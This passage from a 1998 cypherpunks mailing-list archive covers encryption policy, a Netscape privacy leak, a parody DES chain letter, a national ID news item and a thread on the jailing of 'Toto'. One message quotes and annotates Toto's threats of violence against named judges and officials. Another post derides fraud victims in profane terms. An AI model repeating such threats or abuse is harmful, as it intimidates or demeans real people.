 fraud. Which means that we must encrypt our data, so that only
 intended parties can access it.

 A glimpse into the future

 In the U.S. banking system, for example, just two of the largest
 fund-transfer systems transmit more than 300,000 electronic
 fund-transfer messages worth $2 trillion every day. For obvious
 security reasons, the Treasury Department already requires that all
 electronic fund transfers be encrypted.

 For those of us doing commerce at a somewhat smaller order, or
 simply e-mail or information transfers, security is equally compelling.
 One of the primary tasks of government is to protect the interests and
 property of citizens, and in the information and e-commerce age,
 enhancing the encryption of data to ensure its integrity should be one
 of our government's priorities.

 The good news is that encryption technology is galloping forward.
 What was state of the art a few years ago is now rearview-mirror
 encryption. Today, 56-bit encryption, with its 72 trillion combinations, is
 giving way to 128-bit encryption. A Canadian company called Jaws
 Technology has a new technology with 4,096-bit encryption. Cracking
 it, its creators say, would require the equivalent of hitting 1,000
 consecutive holes in one on the golf course from a 150-yard tee.

 The bad news is that our government is demanding limits on
 encryption technology and demanding access to all our encrypted
 messages -- financial, commercial and ordinary e-mail.

 The government's efforts began with the Clipper chip in 1993. The
 Clipper chip would have required encryption users to submit their
 encryption keys to a government database. It met with such a hail of
 objections from technical and civil liberties groups that it never came to
 pass, but the idea lives. The government currently is seeking both the
 funding of a huge new encryption technology center and the means to
 access any computer communication individuals might generate.

 The case against limits on encryption

 It seems to me that all of this is wrongheaded, that these demands for
 government access to our computer transmissions are based on three
 false assumptions.

The first is that government can legislate encryption standards. The
 truth is that encryption technology is moving too rapidly for statutory law
 to keep up. For example, the National Bureau of Standards at one
 point decided that the nation should have a single 56-bit key encryption
 algorithm, an idea almost immediately obsolete as technology went to
 128-bit algorithms and higher.

 Second is the idea that regulation can prevent criminals from acquiring
 unbreakable encryption. The analogy here is a familiar one: Does
 anyone believe that gun-control laws -- gun registration or prohibition of
 ownership, for example -- will keep guns out of the hands of criminals?

 Similarly, encryption-strength ceilings, key escrow or "trapdoors" in
 computer programs to allow government access will limit personal and
 business usage by citizens and slow criminals not at all. The
 international market is too accessible and its encryption offerings
 equally or more sophisticated than U.S. technology.

 Third is the idea that such regulations are cost-free to people using
 computer technology. Key escrow and trapdoor systems would make
 encryption for U.S. businesses and individuals less secure, more
 vulnerable and more easily broken. Weakening the encryption security
 of American users is a not a policy in the national interest. Forcing
 information vulnerabilities upon individuals and businesses is
 weakening national security, not strengthening it.

 Most egregious in such encryption regulation is the massive invasion
 of civil liberties it represents. The idea that various government
 agencies, from the FBI to health-care agencies, the IRS and the
 Justice Department, will have instant access to our Quicken programs,
 e-mail and data transmissions is both dangerous and unsettling.

 Liberty in the 21st century

 It is not as if the government has a good record regarding individual
 privacy. President Nixon's FBI tracked its enemies; the Clinton IRS
 seems to be auditing unfriendly 501(c)(3)s; and some 800 FBI files
 mysteriously found their way to Craig Livingstone's pizza-and-beer
 sessions.

 No doubt there is a unique, it-will-never-happen-again exculpatory
 reason for these violations of civil liberties. But if the government has
 the power to intercept and use your data for its purposes, it will do so
 sooner or later. That is a truth, and no amount of reassurance should
 lead us to believe otherwise.

 From Edmund Burke ("people never give up their liberties but under
 some delusion") to Woodrow Wilson ("the history of liberty is a history
 of limitations of governmental power, not the increase of it"),
 Americans have jealously guarded their freedom. The next frontier of
 free speech will be the technology of encryption.

 In the 18th century, the First Amendment was essential to guarding free
 speech. Protecting the empowering technology of data transmission
 will be just as essential to maintaining liberty in the 21st century.

---
 Pete du Pont is the editor of IntellectualCapital.com. He is a former
Republican
 governor and congressman from Delaware. His e-mail address is
 petedupont@intellectualcapital.com.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 24 Oct 1998 00:39:47 +0800
To: cypherpunks@toad.com
Subject: Re: CyberScam
Message-ID: <199810231545.RAA01452@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:03 PM 10/22/98 -0700, Kevlar wrote:
>And you were just kidding.....

I wasn't kidding.  I was absolutely sincere when I told him to shove
a bowling ball up his ass.

>http://www.zdnet.com/zdnn/stories/zdnn_smgraph_display/0,4436,2151220,00.html
>Or search zdnet's site for "scam" and choose "A Bull In Bull Market".

I read the article, and if that level of cluelessness is indicative of the
mentality of your typical online trader, then they deserve what they
get.  I found a couple of quotes especially amusing.  These are both
from John Reed Stark, another official-type thrown into the internet
without a fucking life preserver, it would seem.

    This lack of information gives rise to a situation "that ends up with
    victims not investing but gambling,"

Oh yeah, aside from these scammers, the stock market is otherwise
a really solid, robust investment scheme.  Playing the stock market
is a gamble, pure and simple, and anyone dumb enough to listen
to the likes of some random asshole touting his crappy stock deserves
what they get.  Darwinism as applied to capitalism.

    "Combine the Web's culture of trust, stir in the greatest bull market
    in history, add stocks that genuinely have had phenomenal growth,
    and you have victims who don't have any reason to disbelieve
    promises of guaranteed 20 percent returns."

The Web's culture of trust?  Oh good, another clueless idiot in charge
of managing internet services.  What culture of trust is it that I've
missed in my internet travels?  Is there some online place chock full
of trusted souls, some Cyber-commune, that I missed?

Oh well, like I said, any idiot that would buy into such an obviously
fraudulent solicitation deserves what they get.  Is it just working in a
new medium that makes people such blatant morons, or is it simply
indicative of the intelligence of your average American?  I'd have to
say that I'm inclined to believe the latter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 06:42:08 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <v04020a16b256af794db4@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 6:00 PM -0400 on 10/23/98, Somebody wrote:


> This looks like spam, except it is coming from a list regular.
> Someone spoofing you?

No, actually they aren't. I have no connection with the Von Mises institute,
either.

However, if you don't want to shell out big bucks for an archival quality
version (and help a good cause in the process) you should at least go to your
library, and, if they don't have a (not-so spiffy :-)) version of von Mises'
_Human Action_ there, you should have them Inter-Library loan it for you.

Another great book in the same vein, actually better, as a first read, is
Friedrich Hayek's _The Road to Serfdom_. Another famous 50-year old book,
pissed upon by statists and leftists for generations, and only now being seen
as one of the best economic books of the century. The most recent edition even
has a forward by Milton Freidman. (Hayek won the Nobel just like Freidman did,
but I don't remember if von Mises did.)

Austrian-school economists rule, d00dz. Enjoy!

Cheers,
Bob Hettinga
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNjEADcUCGwxmWcHhAQFn2QgAj8uZUgaJ7FqAPeFw1XAnUW1TNWETzySc
ATtgkQvzdfJeeq+ROHlzBWnIdoBFJY3RNfyd9Fj1jgumACWivbFhPP32ZhgBscxM
AwCFXmU0FK5Sg2uJNKNxbIkFWFUuGRWib6GCl2dTybM07O5tv10ZaMNHuwNfIwpz
TlcoB74CZdBc5MCh1gD0z0p4rzlByzB5e3HxZEDfCyaA/IIckMBvAhrEALktqalW
pBIDOJ2/os1MM/zqYq+HaWA27UekRFWWupn0SI+15klH0uEf9ODKMmyoV5oUhtPM
pFosbkjqd90dF8mDLeaIVn+2yiJe0A49OHH9NhBc/Wa5MrTzqSaokw==
=rOM2
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 24 Oct 1998 07:44:24 +0800
To: cypherpunks@cyberpass.net
Subject: ITAR and Codebreaking
Message-ID: <199810232323.SAA02700@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know how ITAR applies to cryptographic source code which can
not directly be used to encrypt or decrypt files?

Specifically, do we need to do some horrible export-controlled thing for
source code which contains a very straightforward reference implementation
of DES, and whose output is a file of integers defining a satisfiability
problem instantated for a specific plaintext/ciphertext pair? 

If the answer to this question is "yes," would someone be willing to
donate a few meg on an export-controlled crypto site that we could link
to?

Many thanks. 

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 24 Oct 1998 07:43:08 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Mildly opinionated rambling on the computer/boardgame flamewar (fwd)
Message-ID: <199810232335.SAA14639@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 23 Oct 1998 16:48:37 -0500
> From: "David \"Inky\" Scott" <daves@interoz.com>
> Subject: Re: Mildly opinionated rambling on the computer/boardgame flamewar

> I've said it before and I'll say it again. You can't send a computer to
> the corner store for snacks and drinks. Nor can six or seven players
> easily cluster around a computer game all at once and be working on
> setting up their next turn/movement/etc. Nor is computer gaming a truly
> social gathering, which is the primary reason why many of us play these
> games.

Well *current* games certainly aren't. But that is no indication they must
be that way.

A good example platform that is currently available is Beowulf Linux. If
each player were to ethernet their machines via a hub then they would all in
effect be participating in a game equivalent in human interaction to any
boardgame. This would allow the concept of distributed game servers. If
you're only playing on your machine it's going to be limited. As the number
of machines increases the capability goes up as well. Of course it could be
done over regular machines without the support in the kernel. Set up an api
that provides access to an analog of the 'r' commands in Unix. Then the
necessary graphics and sound engines, graphics libraries, rules engine, ai.
Change the graphics libraries, rules engine, and ai and you have a
completely different game. This would allow two different modes of playfield
geometry. One would be where every player has an identical map. Another
would be where each player has a different map and they are edge-to-edge
according to some algorithm (which wouldn't have to be Cartesian). Have the
basic structure of the game be a 3 dimension, time enabled (it has a game
clock) array. By changing the scale of the display 'unit cube' play at
different levels could be engaged in. When you're networked to other players
your local ai might give you hints or suggestions, or the ai's could take on
the role of moderator. Maket he basic interface webable and you're ready to
go.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 24 Oct 1998 07:54:54 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Mildly opinionated rambling on the computer/boardgame flamewar (fwd) (OOOPS...)
Message-ID: <199810232336.SAA14707@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Sorry for that. My fingers had a mind of their own...;)


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 24 Oct 1998 02:48:02 +0800
To: cypherpunks@cyberpass.net
Subject: Men can be raped
Message-ID: <199810231821.UAA13709@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Of course it's possible to rape a man.  Just because he becomes erect
doesn't mean he desires sexual intercourse.  People are more than the
instictive reactions their body produces.  Someone who chooses not to
engage in sex, but is coerced into doing so, is raped, regardless of
his body's physical reactions.  The key element is coercion.  Erections
or other bodily responses have nothing to do with it.

Consider a murderer who ties his victim to a chair and rigs a diabolical
device.  A hammer strikes the victim's tendon below his knee, causing
his leg to reflexively kick and set off a bomb.  The murdere is caught
but argues that the person committed suicide, since he kicked the bomb
switch himself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 24 Oct 1998 06:43:37 +0800
To: cypherpunks@cyberpass.net
Subject: so, what did Toto *do*, exactly to get locked up? (Re: rules of engagement
In-Reply-To: <19981023152002.24725.qmail@nym.alias.net>
Message-ID: <199810232130.WAA31234@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:
> Adam Back wrote:
> > Re. the discussion of things like "first they came for Jim Bell, but I
> > didn't speak up because I wasn't a tax protester, and then they came
> > for Toto but I didn't speak up because I'm not crazy", etc.
> > 
> > The rules of the game from what I can see is that if one is outspoken,
> > one either needs to be squeaky clean, or have enough funds to hire
> > good lawyers, or to be anonymous.
> 
> [Notwithstanding my preference for the latter]...
> 
> Is it the cypherpunk response to back off with our tail between our legs?
> I hope not.

Fuck no.  Just fight smart.  Don't do dumb things which make you a
target for other than things you are immediately interested in
achieving.

> I smiled when I read about Toto's plans to appear in court in a perl-RSA
> T-shirt. Toto has balls so big he needs a wheel barrow to get around.

Toto is on occasion an inspiration.  I like Toto's attitude, it rocks,
his "FuckYouNess" or whatever he would call it is awesome.  As long as
all he is doing is tapping away behind a keyboard, the coherent
version of Toto rules at caustic rants.

> > That is to say, I suspect that Jim would not have been locked up if he
> > had not a) used false social security numbers, b) not been involved
> > with fake courts, c) not collected IRS employees home addresses, and
> > d) not planted the stink bomb.
> 
> And, more importantly, if crypto-anachy and removal of governments
> weren't on the cypherpunk agenda.

I was just saying that it is smarter to fight one fight at a time.
Crypto-anarchy provides a generic solution to problems of increasingly
facist governments.  Getting yourself locked up for uninteresting
things does not further your interests.

> Lets not pretend that Jim and Toto (and to a lesser degree the
> scrutinee J Choate) are not scapegoats for all of our opinions.

It is difficult to tell exactly why Jim was incarcerated because the
IRS people may have alternate motives.  However, I suspect Jim Bell's
woes are more to do with involvement with the fake courts, and the use
of real IRS employees names and addresses, which was then taken to be
an immediate threat, taken with the AP rant printout they found in his
car.  I presume in reality he just collected the addresses to have the
fake court serve them with some legal documents.  I also presume the
reason the IRS first got interested in Jim was due to tax evasion,
and/or fake court documents addressed to IRS agents.

Toto is more interesting.  He seems to have been incarcerated because
he tried to stick up for Jim Bell.  What did he do?  Set up an AP bot
mockup, put the same IRS employees names, and a judge (I presume the
judge that handled Jim's case) on the page with $ amounts beside them.
The IRS became aware of Toto because they came across him via
investigation of Jim Bell.  (more on Toto below).

> > The AP rants are perfectly defensible free speech and free-wheeling
> > political discussion.
> 
> Yes. "defensible", but they weren't defended. Jim pleaded. As would anyone
> in the face of sufficient pressure.

Also what I am saying is that it makes it hard to defend people if
they have done any number of dumb things which are the ostensible
reason they are locked up.  To defend Jim, you would have to defend
fake courts, fake social security numbers to avoid taxation, stink
bombs, and convince them that the collection of IRS employee names and
addresses had nothing to do with the AP rant.  If he had just been
ranting about AP, they never would have even bothered him, or if they
had, I think he would have had much more support.  Perhaps even the
EFF could have been interested.

> > Similarly with Toto, the rants would have been ok, without a) the
> > mockup non-functional "bomb" symbolically planted in the court house
> > basement or where-ever it was, b) using real IRS employees, and judges
> > names in his rant (apparently in support of Jim Bell), c) having
> > tourettes syndrome.
> 
> The rants are ok anyway. They are clearly metaphors. But the
> prosecutors aren't playing fair.  The man is "dangerous". And not
> because he wrote "bomb" in crayon on a cardboard box. But because he
> made waves. Waves that we caught.  Waves that the straights and
> sheeple might catch.

I'd be interested in opinions on why they locked up Toto.  The legal
docs John Young obtained and put on up on the web (look at the bottom
of http://www.jya.com cryptome page for `Carl Johnson'), says that it
is because he made a threat.

What about the following excerpt from the Toto post below could be
construed to constitute a danger, or did Toto get locked up because he
walked right up to the IRS and said "Fuck You", and "here I am come
and get me".

I have inserted the odd comment.  Anyone like to comment on how likely
a case by the IRS based on this post by `Toto' is to stick?  The AP
bot mockup I think was clearly not a credible threat, it was
completely non-functional.

Adam

: OFFICIAL 'PHYSICAL' DEATH THREAT!!!
:   The pen is mightier than the sword. Thus, I prefer to wage my
: 'war to the death' against those who would stomp on my basic
: human rights *"in the interests of National Security"* with my
: electronic pen, on the InterNet, using encryption when I have
: reason to fear persecution by Facist, Nazi motherfuckers.
: [* ~~ TruthMonger Vernacular Translation ~~ "so that the
:  government can maintain its authority over the citizens
:  by use of force and violation of human rights, rather than
:  going to all of the trouble of acting in a manner that will
:  garner the citizens' respect."]

Pen is mightier than sword, prefers words to actions, no threat there.

:   I will continue to express my thoughts through the words
: I send electronically over the InterNet, both publically
: and privately. I will fight to the bandwidth death against
: anyone who wants to deny me my right to express my opinions
: and access the opinions of those who also wish to express
: their own opinions and share their true thoughts with their
: fellow humans.

he will fight to the "bandwidth death" (argue vigorously and
verbosely) anyone who tries to interfere with right to private
communication.  No threat.

:   If the ElectronicMagnetic Curtain slams down around me,
: then I will have no choice but to continue my current fight
: in MeatSpace.
:   And I am not alone...

Says if he is prevented from communicating privately
(ElectronicMagnetic Curtain he used early to refer to key escrow
attempts, and government intrusions) he will continue his fight in
meat space.  Just rhetoric, nothing illegal about fighting words.

:   I will share the same 'DEATH THREAT!!!' with Judges Fletcher,
: Nelson and Bright that I have shared with the President and
: a host of Congressional and Senatorial representatives:

So he sent the following quoted paragraph to president@whitehouse.gov?
Sending threats to president@whitehouse.gov however rhetorical is a
sure-fire way to get an immediate visit from men in dark suits.
However that has nothing to do with the IRS.  And the "threat" appears
to be an expression of annoyance with the government, and a possibly a
general prediction rather than any kind of specific threat:

:   "You can fuck some of the people all of the time, and all of
: the people some of the time, but you are going to end up in a
: body bag or a pine box before you manage to fuck all of the
: people all of the time."

Rhetoric, word play on quote "you can fool all of the people some of
the time, some of the people all of the time, but not all of the
people all of the time".

:   Am *I* going to whack you out? Maybe...

Sounding a bit more specific there, though it is only a "Maybe...",
and the following literary quotes suggest he is more ranting than
anything.  

People on list have suggested that it is better to vent anger with
unspecific third person comments "They ought to be taken out and
shot", "they should be the first against the wall come the
revolution".  But I am not up to speed on the legal issues here.

It seems likely as a whole that Toto is just ranting.  And surely once
they have pulled him in they have to show some actual credible plan.
Mere ranting about officials I presume is not grounds for locking
people up.

:   I would prefer just dumping some tea in Boston Harbor, if that
: will get my message across in MeatSpace, but if it won't, then
: I guess I will have to take stronger action.

Toto's MeatSpace "actions" to date seems to have been symbolic.  The
"bomb" in the canadian court-house basement which anonymous nicely
charactarized as a cardboard box with "bomb" written on it.

:   There are undoubtedly a plethora of LEA's ready and willing to
: prosecute and imprison me for agreeing with Patrick Henry, who
: said, "Give me liberty, or give me death." 

: The irony, of course,
: is that I do not pose a great danger to anyone but myself as
: long as I continue to have my human rights and my liberty
: unthreatened.

:   The chances of me actually getting off of my fat butt and
: going out into the real world to whack out the enemies of
: freedom are probably pretty small (unless I run out of
: cigarettes and beer, and wouldn't have to make an extra
: trip).

Saying he isn't going to do anything, actually.

:   I fully understand that this does not lessen the potential
: of any LEA who gets a wild hair up their butt to throw a
: mountain of taxpayer resources into prosecuting me and
: imprisoning me for their own professional/political gain.

Predicting his incarceration for political reasons, for exercising his
right to political speech.

:   However, if you are performing actions so outrageously against
: basic human rights and freedoms as to get me off of my lazy ass,
: then I am the least of your problems, because there undoubtedly
: are millions of people more functional than myself (who get out
: of the house and go further than the liquor store) who are less
: willing than myself to put up with increasingly heavy chains
: placed around their hands and feet 'in the interests of national
: security.'

Expressing opinion that increasingly facist government is going to
lead to political unrest.

:   Feel free to have the Federales break down my door and
: imprison me for pointing out the obvious. After all, I fit
: the profile of a domestic terrorist--I quote the Constitution
: and the Bill of Rights, and I speak out against increasingly
: big government.

Come and get me, I sound like a terrorist in that I quote the
constitution, speak out against big government.

:   But remember...it's the quiet ones you've got to watch...
: If you force everyone to 'be quiet', then you've got a world
: of trouble on your hands.

Followed by a few tips on how to find him, and a few comments about
cluelessness of LEAs.

: p.s.
: NOTICE TO LEA AGENTS IN NEED OF A CAREER BOOST!
: [...]
:   However, if you want to go to the trouble of tracking me
: down, I will give you some hints, since it seems likely that
: anyone who has trouble finding a ton of cocaine at an
: airport might not be competent in CyberSpace, either.
:   You might want to check with the Webmasters at the sites
: quoted above to see who has accessed their web sites this
: morning. The anonymous remailer I will be using is an open
: secret to CypherPunks around the world as a really bad
: attempt at disguising my true MeatSpace identity. 

Talking perhaps about his sympatico account which someone claiming to
be Toto claims else-where was shared with a number of hackers.  Don't
recall what the headers on the mail indicated it was from.

: this alone
: ought to be enough for some aggressive young LEA and/or
: federal prosecutor to earn themself some brownie-points,
: since I am a sorry enough son-of-a-bitch that they would not
: have much trouble convicting me in front of a jury of 'their'
: peers, assuming that they can make certain that I am not
: tried by a jury of my own peers.

Telling them he is an easy catch, because he will be easy to make look
bad in a court.

: Bonus Points:
:   I can also be tied into Jim Bell's Worldwide Conspiracy to
: assassinate government authorities, through my implementation
: of an Assassination Bot.

Pointing them to his AP bot mockup.

:  (I am willing to 'rat out' Jim for two bottles of Scotch. If
:  he is willing to rat _me_ out for less, then I guess it's
:  just my hard luck, eh? <--that's another hint!)
: 
: p.p.s.
:   You can also charge me with use of 'conventional' encryption
: in the commission of a crime.
:   Must be your lucky fucking day, eh?

Reference to use of `encryption in commission of a crime' provisions
in recent proposed bills.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 24 Oct 1998 06:41:57 +0800
To: cypherpunks@toad.com
Subject: Irony
Message-ID: <199810232210.AAA31880@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:19 PM 10/23/98 +0200, Mok-Kong Shen wrote:
>> Dear Friend,
>
>I don't know the English term but in my native language what is
>described is call 'chaining letters', supposed to be a method to
>become rich very rapidly. That was illegal, though.

In my language we have something called humor, which some
taxonomize with terms like irony, sarcasm, wit, etc.

	






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Sat, 24 Oct 1998 16:07:21 +0800
To: cypherpunks@Algebra.COM
Subject: Big Brother Netscape
Message-ID: <2d101d9725ee4f1682a3417e5c703039@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




Summary:
Netscape's "what's related" is a backdoor for Netscape to monitor your surfing.

--forwarded text---------------------------------------------------------
>From "Flemming S. Johansen" <fsj@terma.com> on BUGTRAQ@netspace.org

Starting with version 4.06, the Netscape browser has a new "What's
Related?" button next to the Location: field. After having tried it
in the new 4.5, I am more than a little worried by the functionality
behind it.

Briefly, the user clicks on this button, and is presented with a
list of sites which are hopefully related to the page currently
on display, plus some ads for Netscape.

As far as I have been able to deduce (helped by a packet sniffer), this
works by opening a HTTP connection to www-rl.netscape.com and making a
query modelled on this template: GET /wtgn?CurrentURL/ HTTP/1.0, where
CurrentUrl is the URL of the page currently displayed.  The server
responds with a list of URLs it believe to be related. There are four
modes for this function, settable through preferences->navigator->smart
browsing:

    - "Always" The browser always downloads the list of 'related'
      URLS, beginning while the page in question is loading.

    - "Never" The browser starts downloading the list of 'related'
      URLS when the user clicks on the 'What's related?' button.

    - "After first use" Automatically fetches the URL list for
      a page if the user has ever clicked the button for that
      page.

    - Completely disabled.

The default setting is "Always". So, the unsuspecting user who upgrades
to the latest Netscape will automatically and unknowingly begin sending
out a detailed log of pages viewed.

Netscapes privacy statement notwithstanding, I don't like the fact that
anyone is able to compile a list of every single web page I visit. I
don't like the fact that someone with a sniffer anywhere on the path
from here to netscape.com is able to do so either.  And the company I
work for is not too thrilled about the name of every single document on
our internal, not-for-public-viewing web server leaking out on the Net,
once our users begin installing this release on their PCs.

I would like to control this "feature" globally for my LAN, but as far
as I can see, there are only two ways of doing it: Fascist control of
Netscape preferences settings on every PC on my LAN, or block
www-rl.netscape.com in the firewall.

--
  ----------------------------------------------------------------------
        Flemming S. Johansen
        fsj@terma.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Fri, 23 Oct 1998 22:02:56 +0800
To: cypherpunks@cyberpass.net
Subject: Break DES Fast!
Message-ID: <90914889921502@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend,                                  
 
My name is Dave Rhodes.  In 1997 my cipher designs had all been broken, my 
patents declared without merit, and NIST had rejected my preliminary AES 
submission.  Then in early 1998 I received a letter in the mail telling me how 
I could earn fame as a cryptographer whenever I wanted.  I was naturally very 
skeptical and threw the letter on the desk next to my computer.  It's funny 
though, when you are desperate, backed into a corner, your mind does crazy 
things.  I spent a frustating day looking through the DES S-boxes for better 
differentials, but the pickings were sparse at best.  That night I tried to 
unwind by reading a few security newsgroups.  I read several of the posts and 
then glanced at the letter next to the computer.  All at once it came to me, I 
now had the key to my dreams.
 
This year I presented a paper at Crypto'98 and have one accepted for 
Eurocrypt'99.  Cryptographers from all over the world come to me for advice, 
and NIST has asked me to be on the AES evaluation board.  I will have my own 
crypto conference within 4 or 5 months.  Anyone can do the same.  This crypto 
method works perfectly every time, 100% of the time.  Best of all you never 
have to leave home except to go to your mailbox or post office.          
 
I realized that with the power of the computer I could expand and enhance this 
method into the most unbelievable system that has ever been created.  I 
substituted email in place of the post office and electronically did by 
computer what others were doing 100% by mail.  Most of the hard work is 
speedily handled by computers throughout the world.  If you believe that 
someday you deserve that lucky break that you have waited for all your life, 
simply follow the easy instructions below.  Your dreams will come true.
                                                                     
Sincerely yours,                                                
Dave Rhodes                                                          
                                     
INSTRUCTIONS
                                                                    
Follow these instructions EXACTLY, and in 20 to 60 days you will have searched 
well over 50 trillion DES keys.  This program has remained successful because 
of the honesty and integrity of the participants.  Please continue its success 
by carefully adhering to the instructions.  
                                                                   
1. Immediately send the following ciphertext/plaintext pair below to ten 
friends: 12F7E88920:0A2DE3172B
 
2. Remove the searched keyspace that appears at number 1 on the list below.  
Move the other 9 sets of searched keyspaces up one position.  Number 2 will 
become number 1 and number 3 will become number 2, etc.  Place the keyspace 
you've searched in the number 10 position.
            
3. Post the message with the keyspace you've tried in the number 10 position 
into 10 separate newsgroups or mailing lists, call the file BREAK.DES.FAST.
                                                                  
4. Within 60 days you will receive over 50 trillion further DES keys which 
people have tried.
 
This is not a scam.  This is perfectly legal.  If you have any doubts, refer 
to 22 USC Sec 2778.
 
[Keyspace list snipped]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 25 Oct 1998 00:25:45 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Money withheld for national ID cards
Message-ID: <v04020a1cb25781bc8c8e@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
From: "ScanThisNews" <mcdonalds@airnet.net>
To: ignition-point@majordomo.pobox.com
Subject: IP: [FP] Money withheld for national ID cards
Date: Fri, 23 Oct 1998 20:34:02 -0500
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: "ScanThisNews" <mcdonalds@airnet.net>


SCAN THIS NEWS

FRIDAY
OCTOBER 23, 1998

Money withheld for national ID cards
  Spending bill provides moratorium
  on implementation

http://www.worldnetdaily.com/exclusiv/981023_money_withheld_nat.shtml

Copyright 1998, WorldNetDaily.com
http://www.worldnetdaily.com/

By David M. Bresnahan
david@talkusa.com

The recently passed Omnibus Appropriations Bill included funding for $520
billion of spending, but it purposely excluded funds for the national ID
card or the medical ID program.

A review of the bill, which had over 4,000 pages and is 16 inches thick,
revealed that the opponents of the effort to make state driver's licences
into a national ID card succeeded in getting a moratorium on the
implementation of the law enacted in 1996 by Congress.

Both the national ID and the medical ID have already been made law. The
moratorium delays implementation from occurring on schedule while repeal
legislation is debated by Congress.

The national ID became law in 1996 and will go in effect October 1, 2000,
unless Congress repeals Section 656 (b) of the Illegal Immigration Reform
and Immigrant Responsibility Act.

If the law is not changed, every state must meet certain unfunded federal
mandates requiring the use of Social Security numbers, fingerprints, DNA,
retina scans, and other "biometric" identifying information on all driver's
licences.

Another federal mandate is the medical ID, which will be a new unique number
for every American intended to keep a detailed medical history in a
government computer. It will be implemented unless Congress acts to repeal
Section 1173 (b) of the Social Security Act.

The moratorium was first included in a transportation appropriations bill,
but Rep. Lamar Smith, R-TX, convinced Speaker Newt Gingrich, R-GA, to remove
it before passage, according to House Transportation Committee sources. Rep.
Frank Wolf, R-VA, chairman of the House Appropriations Transportation
Subcommittee included the ban in the omnibus bill, according to a committee
staff member. However, Smith was reported to be pushing to have that removed
as well. Those efforts failed, largely because of thousands of calls placed
to Gingrich's office by the public, according to congressional staffers who
preferred not to be identified.

Patrick Poole of the "Free Congress Foundation," a non-partisan group, sent
thousands of e-mails to supporters who then called Gingrich to encourage him
to keep the moratorium despite the efforts of Smith. WorldNetDaily.com
reported Monday that Smith was trying to remove the ban.

"Many of the callers either faxed copies of stories from WorldNetDaily, or
they mentioned it when they called," the source said. "There was no way the
speaker could support Smith's efforts with that kind of public awareness."

The actual language found in the Omnibus Bill states:

"National Identifiers:

"None of the funds appropriated by this Act may be used to issue a final
